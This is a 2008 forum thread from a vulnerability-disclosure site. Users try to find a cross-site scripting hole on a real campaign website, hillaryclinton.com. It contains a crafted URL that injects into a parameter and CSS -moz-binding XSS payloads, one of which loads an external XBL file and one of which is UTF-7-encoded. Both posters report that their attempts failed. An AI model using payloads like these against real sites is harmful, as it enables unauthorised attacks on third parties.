Possible Hilary Clinton XSS

sla.ckers.org is
ha.ckers sla.cking

Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

Possible Hilary Clinton XSS

Posted by: PaPPy

Date: May 28, 2008 01:16PM

Been working at this for some time but cant seem to get anything to work

http://www.hillaryclinton.com/_base/error/?aspxerrorpath=/redirs/form/default.aspx&ref="><
but if i add anything after that it seems to fail...

well just throwing it out there if anyone can improve on my failure

Options: Reply•Quote

Re: Possible Hilary Clinton XSS

Posted by: Jiu

Date: May 28, 2008 04:33PM

"style="-moz-binding:url('//ha.ckers.org/xssmoz.xml%23xss');

Seems that no more works on FF2 :(

"style="-moz-binding:url(data:text/xml;charset=utf-7,%2bADw-?xml version='1.0'?%2bAD4APA-bindings xmlns='http://www.mozilla.org/xbl'%2bAD4APA-binding%20id='xss'%2bAD4APA-implementation%2bAD4APA-constructor%2bAD4-alert('XSS');%2bAPA-/constructor%2bAD4APA-/implementation%2bAD4APA-/binding%2bAD4APA-/bindings%2bAD4-);

Dont work, perhaps you cant use utf-7 here ^^

Edited 2 time(s). Last edit at 05/28/2008 04:38PM by Jiu.

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login